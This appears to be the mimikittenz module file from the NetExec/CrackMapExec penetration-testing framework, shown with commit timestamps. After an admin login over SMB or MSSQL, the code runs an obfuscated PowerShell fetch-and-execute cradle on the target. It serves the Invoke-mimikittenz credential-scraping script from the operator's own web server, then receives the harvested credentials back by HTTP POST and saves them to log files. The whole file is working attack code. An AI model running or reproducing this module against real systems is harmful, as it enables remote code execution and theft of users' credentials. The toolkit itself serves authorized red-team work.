NetExec/cme/modules/mimikittenz.py

64 lines
2.1 KiB
Python
Raw Normal View History

2017-03-27 21:09:36 +00:00
from cme.helpers.powershell import *
from cme.helpers.logger import write_log
2019-11-12 19:42:45 +00:00
from io import StringIO
2017-03-27 21:09:36 +00:00
from datetime import datetime
class CMEModule:
'''
Executes the Mimikittenz script
Module by @byt3bl33d3r
'''
name = 'mimikittenz'
description = "Executes Mimikittenz"
supported_protocols = ['mssql', 'smb']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
'''
self.ps_script = obfs_ps_script('mimikittenz/Invoke-mimikittenz.ps1')
2017-03-27 21:09:36 +00:00
return
def on_admin_login(self, context, connection):
2017-03-27 21:09:36 +00:00
command = 'Invoke-mimikittenz'
2017-04-03 15:25:05 +00:00
launcher = gen_ps_iex_cradle(context, 'Invoke-mimikittenz.ps1', command)
2017-03-27 21:09:36 +00:00
2017-10-25 06:45:58 +00:00
connection.ps_execute(launcher)
2017-03-27 21:09:36 +00:00
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'Invoke-mimikittenz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
#with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
# ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
request.wfile.write(self.ps_script.encode())
2017-03-27 21:09:36 +00:00
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
2017-03-27 21:09:36 +00:00
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
def print_post_data(data):
buf = StringIO(data.strip()).readlines()
for line in buf:
context.log.highlight(line.strip())
print_post_data(data)
log_name = 'MimiKittenz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved output to {}".format(log_name))